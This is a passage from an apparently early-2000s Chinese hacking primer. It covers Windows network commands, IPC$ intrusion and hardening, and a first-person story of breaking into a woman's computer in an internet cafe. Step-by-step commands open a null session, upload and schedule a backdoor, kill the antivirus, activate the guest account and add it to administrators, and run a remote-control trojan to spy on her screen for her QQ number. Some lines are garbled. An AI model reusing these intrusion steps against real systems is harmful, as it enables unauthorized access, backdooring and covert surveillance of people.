SubSeven Server Sniper 则是用来检测并清除 SubSeven 而设计的。不同的是,这个软件不但可以清楚 SubSeven,而且还能搜集攻击者在您电脑中留下的蛛丝马迹,找到攻击者的 ICQ 号码、email 地址等内容,从而为反跟踪提供了详尽的信息。 14 Attacker 端口监听程序:这是一个 TCP/UDP 端口监听程序,它可以常驻系统并在危险端口打开的时 候发出警告信息,保证个人上网隐私的安全性。 ICEWatch BlackICE 插件:这个插件可以完善 BlackICE 的结果列表,让列表更加详尽,同时该插件还 提供了更好的结果分类查询功能,并且可以对结果进行复制、编辑等操作。另外此插件为 BlackICE 提供了声音,可以设置软件使用过程中的提醒、警告的音效。 Isecure IP Scanner netbios 共享扫描器:黑客利用 netbios 的共享可以进入存在问题的电脑并对硬盘进行操作, 同时还可以获得入侵电脑上的隐私资料。这个扫描器就是专门为防止此类事件发生开发的, 运行软件会自动扫描目标并报告有关资料。 AnalogX Port Blocker 端口屏蔽程序:当使用者的电脑上开放某个端口的时候,任何人都可以通过其开放端口访问 相应资源,而 AnalogX Port Blocker 可以屏蔽某个端口,或者设置特殊 IP 地址禁止对指定端 口的请求,这从一定程度上方便了程序调试人员为在本地系统上从事软件的测试工作。 Tambu Dummy Server 端口屏蔽程序:这个工具同上面一个程序的功能是一样的,不过不同的是,这个工具是基于 控制台模式,更加适合于高手。 Tambu Registry Edit 注册表修改程序:该程序可以让使用者手动修改系统注册表中的各项键值,从而改变系统的 性能,同时软件中保存了网络上常见的具有破坏性程序的资料,可以迅速确定系统注册表中 是否有可疑程序,并提供了清除和备份等功能。 ================================================== 黑客必学的六条系统命令 这里我补充下,见笑了,呵呵,想学入侵,一定要知道 cmd 下的命令,如用 ipc$入侵等, 我发现有些人只知道黑客工具的使用,dos 命令却一个都不知,其实适当的熟悉一些命令也 无妨! 15 如:刚装完系统,打开了默认共享,现在用 dos 命令建立一个批处理删除默认共享。如下: 先打开 cmd 窗口,输入 copy con killshare.bat net share c$ /del net share d$ /del net share e$ /del net share admin$ /del net share ipc$ /del (如果删除了这个共享,则局域网无法互相访问,请注意!) 以下是原文:----------------------------------------------------------- 一、ping 命令 在 Windows 的控制窗口中(Windows 95/98/ME 的 command 解释器、Windows NT/2000 的 cmd 解释器),运行 ping 可以看到这个命令的说明,它是一个探测本地电脑和远程电脑之间 信息传送速度的命令,这个命令需要 TCP/IP 协议的支持,ping 将会计算一条信息从本地发 送到远程再返回所需要的时间,黑客使用这个命令决定是否对服务器进行攻击,因为连接速 度过慢会浪费时间、花费过多的上网费用。 另外这个命令还可以透过域名找到对方服务器的 IP 地址,我们知道域名只是提供给浏览网 页用的,当我们看到一个不错的域名地址后,要想通过 telnet 连接它,就必须知道对方的 IP 地址,这里也要使用 ping 命令的。 这个命令的基本使用格式可以通过直接运行ping获得,现在假设目标是http://www.abc.com/, 则可以在控制台下输入 ping www.abc.com,经过等待会得到如下信息: Pinging www.abc.com [204.202.136.32] with 32 bytes of data: Reply from 204.202.136.32: bytes=32 time=302ms TTL=240 Reply from 204.202.136.32: bytes=32 time=357ms TTL=240 Reply from 204.202.136.32: bytes=32 time=288ms TTL=240 Reply from 204.202.136.32: bytes=32 time=274ms TTL=240 Ping statistics for 204.202.136.32: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 274ms, Maximum = 357ms, Average = 305ms 注意它的返回值来判断对方 OS 这些信息的意思是:www.abc.com 的 IP 地址是 204.202.136.32,对他发送了四次数据包,数 据包的大小是 32 字节,每一次返回的时间分别是 302ms、357ms、288ms、274ms。综合看, 发送了四个数据包全部返回,最小时间是 274ms,最大时间 357ms,他们的平均时间是 305ms。 这样黑客就了解了连接对方服务器使用的时间。另外这个命令还有一些特殊的用法,例如可 以通过 IP 地址反查服务器的 NetBIOS 名,现在以 211.100.8.87 为例,使用 ping 配合“-a”, 在控制台下输入命令 ping -a 211.100.8.87,它的返回结果是: Pinging POPNET-FBZ9JDFV [211.100.8.87] with 32 bytes of data: Reply from 211.100.8.87: bytes=32 time=96ms TTL=120 Reply from 211.100.8.87: bytes=32 time=110ms TTL=120 Reply from 211.100.8.87: bytes=32 time=110ms TTL=120 Reply from 211.100.8.87: bytes=32 time=109ms TTL=120 16 Ping statistics for 211.100.8.87: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 96ms, Maximum = 110ms, Average = 106ms 从这个结果会知道服务器的 NetBIOS 名称是 POPNET-FBZ9JDFV。另外在一般情况下还可 以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows 系列还是 UNIX/Linux 系列,一般情况下 Windows 系列的系统返回的 TTL 值在 100-130 之 间 ,而 UNIX/Linux 系列的系统返回的 TTL 值在 240-255 之间,例如上面的 www.abc.com 返 回的 TTL 是 240,对方的系统很可能是 Linux,而第二个目标的 TTL 是 120,那么说明它使 用的系统也许是 Windows。 另外 ping 还有很多灵活的应用,我不在这里过多的介绍,读者请另行查阅此命令相关帮助 文件。 二、net 命令: NET 命令是很多网络命令的集合,在 Windows ME/NT/2000 内,很多网络功能都是以 net 命令为开始的,通过 net help 可以看到这些命令的详细介绍: NET CONFIG 显示系统网络设置 NET DIAG 运行 MS 的 DIAGNOSTICS 程序显示网络的 DIAGNOSTIC 信息 NET HELP 显示帮助信息 NET INIT 不通过绑定来加载协议或网卡驱动 NET LOGOFF 断开连接的共享资源 NET LOGON 在 WORKGROUP 中登陆 NET PASSWORD 改变系统登陆密码 NET PRINT 显示或控制打印作业及打印队列 NET START 启动服务,或显示已启动服务的列表 NET STOP 停止网络服务 NET TIME 使计算机的时钟与另一台计算机或域的时间同步 NET USE 连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息 NET VER 显示局域网内正在使用的网络连接类型和信息 NET VIEW 显示域列表、计算机列表或指定计算机的共享资源列表 这些命令在 Win95/98 中支持的比较少,只有几个基本常见的,而在 NT 或者 2000 中又元元 多于上面的介绍,不过大多数对于初学者也没有必要掌握,所以我选择了 WindowsME 进行 介绍,其中最常用到的是 NET VIEW 和 NET USE,通过者两个命令,学习者可以连接网络 上开放了远程共享的系统,并且获得资料。这种远程共享本来是为便捷操作设计的,但是很 多网络管理员忽视了它的安全性,所以造成了很多不应该共享的信息的暴露,对于学习者来 说,则可以轻易获得它人电脑上的隐私资料。 例如在控制台下输入 net view \\202.96.50.24 则可以获得对应 IP 的系统共享目录,进而找到 他们的共享文件,当然这需要 202.96.50.24 系统的确存在共享目录,具体如何找到这些存在 共享的系统,我将会在后面的文章中进行介绍。 三、telnet 和 ftp 命令: 这两个命令分别可以远程对系统进行 telnet 登陆和 ftp 登陆,两种登陆使用的不同的协议, 17 分别属于两种不同的网络服务,ftp 是远程文件共享服务,也就是说学习者可以将自己的资 料上传、下载,但是它并没有过多的权利,无法在远程电脑上执行上传的文件;而 telnet 则 属于远程登陆服务,也就是说可以登陆到远程系统上,并获得一个解释器权限,拥有解释器 就意味着拥有了一定的权限,这种权限可能是基本的文件操作、也可能是可以控制系统的管 理员权限。 ================================================== 四、netstat 命令: 这个程序有助于我们了解网络的整体使用情况。它可以显示当前正在活动的网络连接的详细 信息,如采用的协议类型、当前主机与远端相连主机(一个或多个)的 IP 地址以及它们之 间的连接状态等。 使用 netstat ?可以显示它的命令格式和参数说明: netstat [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] 其中的参数说明如下: -a 显示所有主机的端口号; -e 显示以太网统计信息; -n 以数字表格形式显示地址和端口; -p proto 显示特定的协议的具体使用信息; -r 显示本机路由表的内容; -s 显示每个协议的使用状态(包括 TCP、UDP、IP); interval 重新显示所选的状态,每次显示之间的间隔数(单位秒)。 netstat 命令的主要用途是检测本地系统开放的端口,这样做可以了解自己的系统开放了什么 服务、还可以初步推断系统是否存在木马,因为常见的网络服务开放的默认端口轻易不会被 木马占用,例如:用于 FTP(文件传输协议)的端口是 21;用于 TELNET(远程登录协议) 的端口是 23;用于 SMTP(邮件传输协议)的端口是 25;用于 DNS(域名服务,即域名与 IP 之间的转换)的端口是 53;用于 HTTP(超文本传输协议)的端口是 80;用于 POP3(电 子邮件的一种接收协议)的端口是 110;WINDOWS 中开放的端口是 139,除此以外,如果 系统中还有其他陌生的到口,就可能是木马程序使用的了。通过 netstat 或者 netstat -a 可以 观察开放的端口,如果发现下面的端口,就说明已经有木马程序在系统中存在: 31337 号端口是 BackOffice 木马的默认端口;1999 是 Yai 木马程序;2140 或者 3150 都是 DEEP THROAT 木马使用的端口;还有 NETBUS、冰河或者 SUB7 等木马程序都可以自定义 端口,因此发现了陌生端口一定要提高警惕,使用防火墙或者查病毒软件进行检测。 五、tracert 命令: 这个命令的功能是判定数据包到达目的主机所经过的路径、显示数据包经过的中继节点清单 和到达时间。tracert 命令的格式如下: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name 命令行中的参数-d 是要求 tracert 不对主机名进行解析,-h 是指定搜索到目的地址的最大轮 数,-j 的功能是沿着主机列表释放源路由,-w 用来设置超时时间间隔。 通过 tracert 可以判断一个服务器是属于国内还是国际(网络服务器的物理未知不能依*域名 进行判断),根据路由路经可以判断信息从自己的系统发送到网络上,先后经过了哪些 IP 到 大对方服务器,这就好像乘公共汽车的时候从起点出发到达终点站的时候,中途会出现很多 路牌一个道理,我们清楚了自己的信息的传送路径,才能够更清晰的了解网络、对服务器进 18 行攻击。 六、winipcfg: winipcfg 和 ipconfig 都是用来显示主机内 IP 协议的配置信息。只是 winipcfg 适用于 Windows 95/98,而 ipconfig 适用于 Windows NT。winipcfg 不使用参数,直接运行它,它就会采用 Windows 窗口的形式显示具体信息。这些信息包括:网络适配器的物理地址、主机的 IP 地 址、子网掩码以及默认网关等,点击其中的“其他信息”,还可以查看主机的相关信息如: 主机名、DNS 服务器、节点类型等。其中网络适配器的物理地址在检测网络错误时非常有 用。 ipconfig 的命令格式如下:ipconfig [/? | /all | /release [adapter] | /renew [adapter]] 其中的参数说明如下: 使用不带参数的 ipconfig 命令可以得到以下信息:IP 地址、子网掩码、默认网关。而使用 ipconfig /? 显示 ipconfig 的格式和参数的英文说明; /all 显示所有的配置信息; /release 为指定的适配器(或全部适配器)释放 IP 地址(只适用于 DHCP); /renew 为指定的适配器(或全部适配器)更新 IP 地址(只适用于 DHCP)。 /all,则可以得到更多的信息:主机名、DNS 服务器、节点类型、网络适配器的物理地址、 主机的 IP 地址、子网掩码以及默认网关等。 ================================================== ipc$入侵与防范 一 前言 网上关于 ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为 经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄。 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触 ipc$的菜鸟来说, 简单的罗列步骤并不能解答他们的许多迷惑。 二 什么是 ipc$ IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让 进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计 算机和查看计算机的共享资源时使用。 利用 IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机 器必须开了 ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标 主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。 我们总在说 ipc$漏洞 ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远 19 程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$......)和 系统目录 winnt 或 windows(admin$)。 所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用 心者(到底是什么用心?我也不知道,代词一个)会利用 IPC$,访问共享资源,导出用户列表,并 使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的。 解惑: 1)IPC 连接是 Windows NT 及以上系统中特有的远程网络登陆功能,其功能相当于 Unix 中的 Telnet,由于 IPC$功能需要用到 Windows NT 中的很多 DLL 函数,所以不能在 Windows 9.x 中运行。 也就是说只有 nt/2000/xp 才可以建立 ipc$连接,98/me 是不能建立 ipc$连接的(但有些朋友说 在 98 下能建立空的连接,不知道是真是假,不过现在都 2003 年了,建议 98 的同志换一下系统 吧,98 不爽的) 2)即使是空连接也不是 100%都能建立成功,如果对方关闭了 ipc$共享,你仍然无法建立连接 3)并不是说建立了 ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表 三 建立 ipc$连接在 hack 攻击中的作用 就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是 入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话, 那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!! (基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是 2000server, 还可以考虑开启终端服务方便控制.怎么样?够厉害吧!) 不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员 用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管 理员们也愈加小心了,得到管理员密码会越来越难的 因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现 ipc$连 接并不是万能的,甚至在主机不开启 ipc$共享时,你根本就无法连接。 所以我认为,你不要把 ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门 前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是 ipc$连接在 hack 入侵 中的意义所在。 四 ipc$与空连接,139,445 端口,默认共享的关系 以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实 20 我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的 BBS 可以 说是菜鸟的天堂) 1)ipc$与空连接: 不需要用户名与密码的 ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特 定的用户名和密码进行 ipc$连接),自然就不能叫做空连接了。 许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去 扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以 用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧, 不要偷懒哟)。 2)ipc$与 139,445 端口: ipc$连接可以实现远程登陆及对默认共享的访问;而 139 端口的开启表示 netbios 协议的应用, 我们可以通过 139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接 是需要 139 或 445 端口来支持的。 3)ipc$与默认共享 默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑 盘(c$,d$,e$......)和系统目录 winnt 或 windows(admin$),我们通过 ipc$连接可以实现对这些默 认共享的访问(前提是对方没有关闭这些默认共享) 五 ipc$连接失败的原因 以下 5 个原因是比较常见的: 1)你的系统不是 NT 或以上操作系统; 2)对方没有打开 ipc$默认共享 3)对方未开启 139 或 445 端口(惑被防火墙屏蔽) 4)你的命令输入有误(比如缺少了空格等) 5)用户名或密码错误(空连接当然无所谓了) 另外,你也可以根据返回的错误号分析原因: 错误号 5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限; 错误号 51,Windows 无法找到网络路径 : 网络有问题; 错误号 53,找不到网络路径 : ip 地址错误;目标未开机;目标 lanmanserver 服务未启动; 目标有防火墙(端口过滤); 错误号 67,找不到网络名 : 你的 lanmanworkstation 服务未启动;目标删除了 ipc$; 错误号 1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个 ipc$,请删 除再连。 错误号 1326,未知的用户名或错误密码 : 原因很明显了; 21 错误号 1792,试图登录,但是网络登录服务没有启动 : 目标 NetLogon 服务未启动。(连 接域控会出现此情况) 错误号 2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。 关于 ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无 法详细而确定的说明,就*大家自己体会和试验了。 六如何打开目标的 IPC$(此段引自相关文章) 首先你需要获得一个不依赖于 ipc$的 shell,比 如 sql 的 cmd 扩展、telnet、木 马 ,当 然 ,这 shell 必须是 admin 权限的,然后你可以使用 shell 执行命令 net share ipc$ 来开放目标的 ipc$。从 上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不 知道怎么做的请看 net 命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。 七如何防范 ipc$入侵 1 禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖 win2000 下的空会话》) 首先运行 regedit,找到如下组建 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把 RestrictAnonymous = DWORD 的键值改为:00000001(如果设置为 2 的话,有一些问题会发生,比如一些 WIN 的 服务出现问题等等) 2 禁止默认共享 1)察看本地共享资源 运行-cmd-输入 net share 2)删除共享(每次输入一个) net share ipc$ /delete net share admin$ /delete net share c$ /delete net share d$ /delete(如果有 e,f,......可以继续删除) 3)停止 server 服务 net stop server /y (重新启动后 server 服务会重新开启) 4)修改注册表 运行-regedit server 版 : 找到如下主键 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] 把 AutoShareServer(DWORD)的键值改为:00000000。 pro 版 : 找 到如下主键 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] 把 AutoShareWks(DWORD)的键值改为:00000000。 如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。 3 永久关闭 ipc$和默认共享依赖的服务:lanmanserver 即 server 服务 控制面板-管理工具-服务-找到 server 服务(右击)-属性-常规-启动类型-已禁用 4 安装防火墙(选中相关设置),或者端口过滤(滤掉 139,445 等),或者用新版本的优化大师 22 5 设置复杂密码,防止通过 ipc$穷举密码 八 相关命令 1)建立空连接: net use \\IP\ipc$ "" /user:""(一定要注意:这一行命令中包含了 3 个空格) 2)建立非空连接: net use \\IP\ipc$ "用户名" /user:"密码" (同样有 3 个空格) 3)映射默认共享: net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的 c 盘映射为自己的 z 盘,其他盘 类推) 如果已经和目标建立了 ipc$,则可以直接用 IP+盘符+$访问,具体命令 net use z: \\IP\c$ 4)删除一个 ipc$连接 net use \\IP\ipc$ /del 5)删除共享映射 net use c: /del 删除映射的 c 盘,其他盘类推 net use * /del 删除全部,会有提示要求按 y 确认 九 经典入侵模式 这个入侵模式太经典了,大部分 ipc 教程都有介绍,我也就拿过来引用了,在此感谢原创作 者!(不知道是哪位前辈) 1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" 这是用《流光》扫到的用户名是 administrators,密码为"空"的 IP 地址(空口令?哇,运气好到 家了),如果是打算攻击的话,就可以用这样的命令来与 127.0.0.1 建立一个连接,因为密码 为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入 administrators, 命令即可成功完成。 2. C:\>copy srv.exe \\127.0.0.1\admin$ 先复制 srv.exe 上去,在流光的 Tools 目录下就有(这里的$ 是指 admin 用户的 c:\winnt\system32\,大家还可以使用 c$、d$,意思是 C 盘与 D 盘,这看你要复制到什么地 方去了)。 3. C:\>net time \\127.0.0.1 查查时间,发现 127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。 4. C:\>at \\127.0.0.1 11:05 srv.exe 用 at 命令启动 srv.exe 吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!) 5. C:\>net time \\127.0.0.1 再查查到时间没有?如果 127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下 面的命令。 6. C:\>telnet 127.0.0.1 99 这里会用到 Telnet 命令吧,注意端口是 99。Telnet 默认的是 23 端口,但是我们使用的是 SRV 在对方计算机中为我们建立一个 99 端口的 Shell。 虽然我们可以 Telnet 上去了,但是 SRV 是一次性的,下次登录还要再激活!所以我们打算 建立一个 Telnet 服务!这就要用到 ntlm 了 7.C:\>copy ntlm.exe \\127.0.0.1\admin$ 23 用 Copy 命令把 ntlm.exe 上传到主机上(ntlm.exe 也是在《流光》的 Tools 目录中)。 8. C:\WINNT\system32>ntlm 输入 ntlm 启动(这里的 C:\WINNT\system32>指的是对方计算机,运行 ntlm 其实是让这个 程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启 Telnet 服务! 9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在 DOS 上操作一样简单! (然后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把 guest 激活加到管理组 10. C:\>net user guest /active:yes 将对方的 Guest 用户激活 11. C:\>net user guest 1234 将 Guest 的密码改为 1234,或者你要设定的密码 12. C:\>net localgroup administrators guest /add 将 Guest 变为 Administrator^_^(如果管理员密码更改,guest 帐号没改变的话,下次我们可以 用 guest 再次访问这台计算机) 十 总结: 关于 ipc 入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论。 ================================================================ 网吧入侵全攻略 好久都没来网吧了.今天一朋友来找我.外面有下着雪.实在没地方玩.又给溜进了网吧... 在以前家里没买电脑时.整天都泡这网吧..所以对他的系统设置什么还了解点.都大半年没来 了...不知道有啥变化.. 这网吧还不错.别的网吧都是无盘的或者就是 98 的.这里 98 和 2000 都有..呵...搞入侵可方便 了.... 无意的看到 13 号坐着两 MM...嘻....入侵也由此开始了.看能不能拿到 MM 的 QQ 号.....偶也找 了一 2000 系统的机器做下..(偶找了一角落.呵.这样比较安全点..) 打开偶可爱的 CMD..先 net name 下看看本机情况 WANGLU05 USER2000 命令成功完成。 我本机名是 WA NGLU05.ping 下看看 IP 有无什么规则 Pinging wanglu05 [192.168.0.13] with 32 bytes of data: Reply from 192.168.0.13: bytes=32 timenet use //192.168.0.225/ipc$ "" /user:"user04" 命令成功完成。 24 网吧系统盘为 G 盘.接着映射对方 G 盘为我本地 Z 盘. G:/>net use z: //192.168.0.225/g$ 命令成功完成。 现在我的电脑里多了一个 Z 盘...图 3. 现在我们在这个 Z 盘里新建或删除文件.也就等于在 192.168.0.225 这个机器上操作了... 这些相信大家都知道的吧..我就不废话了..当然这些还不是我们想要的...要进一步控制她.然 后拿到 QQ 号.^_^........表说我坏.... 下面来 copy 一个木马客户端上去先...由于只是看 QQ 而已...所以我找了一个 web 控制台.体积没多大,205KB..下面是关于 webserver 的介绍./../ web 控制台 (本站不提供此类工具下载) 一个直接在 IE 栏里输入对方 IP 就可以控制对方机器的小软件,也就是所谓的 B/S 模式的控 制。用起来很方便,对方运行了服务端后,你在 IE 栏里直接输入对方 IP 就可以控制了,也 可以通过刷新来实现重复抓屏。 接着 G:/>copy webserver.exe //192.168.0.225/admin$ 已复制 1 个文件。 G:/>net time //192.168.0.225 //192.168.0.225 的当前时间是 2005/2/5 下午 05:00 命令成功完成 G:/>at //192.168.0.225 17:02 webserver.exe 用 AT 命令启动 webserver.exe. 2 分钟过后.在 IE 里输入 192.168.0.225.就可以控制对方了...可是偶一会用 net time 查看时.都 已经过了3分钟了.还是打不开....后来又重新来了一次.眼睛就盯着MM的屏幕看,才发现到了 我指定的时间.程序执行时.被瑞星给杀了... FT....我说那. 难道就没办法了吗...当然不是...可以换个别的马或加壳.修改它特征码什么的.但在网吧工具 也不是很齐全.我也懒的下.. 还好微软为我们提供了一个非常不错的系统工具....也算的上是一类控制软件了... 打开控制面板--管理工具--计算机管理 操作-连接到另一计算机. 然后输入 IP192.168.0.225 呵.等一会就可以看到成功了...你看到了什么? 更爽的是我们可以远程开启他的服务...在这里启动他的 telnet 服务. OK 了... 本地打开一 cmd 输入 G:/>telnet 192.168.0.225 回车后出现 25 Server allows NTLM authentication only Server has closed connection 需要 NTML 认证的...用小榕的那个 ntml.exe 就可以解决这一问题. ntlm.exe 在《流光》的 Tools 目录中有的... 没工具怎么办呢.. 我们在本地添加一和远程主机同样的用户名 输入 net user user04 /add 添加 user04 密码为空的用户 net localgroup administrators user04 /add 把 user04 加入管理员组 然后来到 G:/Winnt/system32 下找到 CMD.exe 右击.创建快捷方式.然后在快捷方式 CMD 右击..属性. 在以其他用户身份运行前打勾... 然后运行 快捷方式 CMD 弹出窗口.在用户名处输入 user04 密码为空 然后 telnet 192.168.0.225 回车..哈哈...拿到 shell 了.... 接下来的事就好办了...去黑基 down 了一个 knlps 命令行下杀进程的东东 copy 上去././然后 telnet 上去.在 CMD 下执行...杀掉了瑞星的进程 这下把瑞星给关了.还怕他提示有毒 接着执行 webserver.exe 在 IE 里输入 192.168.0.225 看到了.挖卡卡..开心...点那个查看屏幕..呵..MM 正在聊天... 好了她的 QQ 号码也拿到手了..加了她去聊聊去.... 一.黑客的分类和行为 以我的理解,“黑客”大体上应该分为“正”、“邪”两类,正派黑客依*自己掌握的知识帮助 系统管理员找出系统中的漏洞并加以完善,而邪派黑客则是通过各种黑客技能对系统进行攻 击、入侵或者做其他一些有害于网络的事情,因为邪派黑客所从事的事情违背了《黑客守则》, 所以他们真正的名字叫“骇客”(Cracker)而非“黑客”(Hacker), 也 就是我们平时经常听 说的“黑客”(Cacker)和“红客”(Hacker)。 无论那类黑客,他们最初的学习内容都将是本部分所涉及的内容,而且掌握的基本技能也都 是一样的。即便日后他们各自走上了不同的道路,但是所做的事情也差不多,只不过出发点 和目的不一样而已。 26 很多人曾经饰遥骸白龊诳推绞倍甲鍪裁矗渴遣皇非常刺激?”也有人对黑客的理解是“天天 做无聊且重复的事情”。实际上这些又是一个错误的认识,黑客平时需要用大量的时间学习, 我不知道这个过程有没有终点,只知道“多多益善”。由于学习黑客完全出于个人爱好,所 以无所谓“无聊”;重复是不可避免的,因为“熟能生巧”,只有经过不断的联系、实践,才 可能自己体会出一些只可意会、不可言传的心得? 在学习之余,黑客应该将自己所掌握的知识应用到实际当中,无论是哪种黑客做出来的事情, 根本目的无非是在实际中掌握自己所学习的内容。黑客的行为主要有以下几种: 一、学习技术 互联网上的新技术一旦出现,黑客就必须立刻学习,并用最短的时间掌握这项技术,这里所 说的掌握并不是一般的了解,而是阅读有关的“协议”(rfc)、深入了解此技术的机理,否 则一旦停止学习,那么依*他以前掌握的内容,并不能维持他的“黑客身份”超过一年。 初级黑客要学习的知识是比较困难的,因为他们没有基础,所以学习起来要接触非常多的基 本内容,然而今天的互联网给读者带来了很多的信息,这就需要初级学习者进行选择:太深 的内容可能会给学习带来困难;太“花哨”的内容又对学习黑客没有用处。所以初学者不能 贪多,应该尽量寻找一本书和自己的完整教材、循序渐进的进行学习。 二、伪装自己: 黑客的一举一动都会被服务器记录下来,所以黑客必须伪装自己使得对方无法辨别其真实身 份,这需要有熟练的技巧,用来伪装自己的 IP 地址、使用跳板逃避跟踪、清理记录扰乱对 方线索、巧妙躲开防火墙等。 伪装是需要非常过硬的基本功才能实现的,这对于初学者来说成的上“大成境界”了,也就 是说初学者不可能用短时间学会伪装,所以我并不鼓励初学者利用自己学习的知识对网络进 行攻击,否则一旦自己的行迹败露,最终害的害是自己。 如果有朝一日你成为了真正的黑客,我也同样不赞成你对网络进行攻击,毕竟黑客的成长是 一种学习,而不是一种犯罪。 三、发现漏洞: 漏洞对黑客来说是最重要的信息,黑客要经常学习别人发现的漏洞,并努力自己寻找未知漏 洞,并从海量的漏洞中寻找有价值的、可被利用的漏洞进行试验,当然他们最终的目的是通 过漏洞进行破坏或着修补上这个漏洞。 黑客对寻找漏洞的执著是常人难以想象的,他们的口号说“打破权威”,从一次又一次的黑 客实践中,黑客也用自己的实际行动向世人印证了这一点——世界上没有“不存在漏洞”的 程序。在黑客眼中,所谓的“天衣无缝”不过是“没有找到”而已。 四、利用漏洞: 对于正派黑客来说,漏洞要被修补;对于邪派黑客来说,漏洞要用来搞破坏。而他们的基本 前提是“利用漏洞”,黑客利用漏洞可以做下面的事情: 1、获得系统信息:有些漏洞可以泄漏系统信息,暴露敏感资料,从而进一步入侵系统; 27 2、入侵系统:通过漏洞进入系统内部,或取得服务器上的内部资料、或完全掌管服务器; 3、寻找下一个目标:一个胜利意味着下一个目标的出现,黑客应该充分利用自己已经掌管 的服务器作为工具,寻找并入侵下一个系统; 4、做一些好事:正派黑客在完成上面的工作后,就会修复漏洞或者通知系统管理员,做出 一些维护网络安全的事情; 5、做一些坏事:邪派黑客在完成上面的工作后,会判断服务器是否还有利用价值。如果有 利用价值,他们会在服务器上植入木马或者后门,便于下一次来访;而对没有利用价值的服 务器他们决不留情,系统崩溃会让他们感到无限的快感! ================================================== 二.黑客应掌握的基本技能 从这一节开始,我们就真正踏上学习黑客的道路了,首先要介绍的是作为一名初级黑客所必 须掌握的基本技能,学习这可以通过这一节的阅读了解到黑客并不神秘,而且学习起来很容 易上手。为了保证初学者对黑客的兴趣,所以本书采取了循环式进度,也就是说每一章节的 内容都是独立、全面的,学习者只有完整的学习过一章的内容,才能够进而学习下一章的内 容。 一、了解一定量的英文: 学习英文对于黑客来说非常重要,因为现在大多数资料和教程都是英文版本,而且有关黑客 的新闻也是从国外过来的,一个漏洞从发现到出现中文介绍,需要大约一个星期的时间,在 这段时间内网络管理员就已经有足够的时间修补漏洞了,所以当我们看到中文介绍的时候, 这个漏洞可能早就已经不存在了。因此学习黑客从一开始就要尽量阅读英文资料、使用英文 软件、并且及时关注国外著名的网络安全网站。 二、学会基本软件的使用: 这里所说的基本软件是指两个内容:一个是我们日常使用的各种电脑常用命令,例如 ftp、 ping、net 等;另一方面还要学会有关黑客工具的使用,这主要包括端口扫描器、漏洞扫描 器、信息截获工具和密码破解工具等。因为这些软件品种多,功能各不相同,所以本书在后 面将会介绍几款流行的软件使用方法,学习者在掌握其基本原理以后,既可以选择适合自己 的,也可以在“第二部分”中找到有关软件的开发指南,编写自己的黑客工具。 三、初步了解网络协议和工作原理: 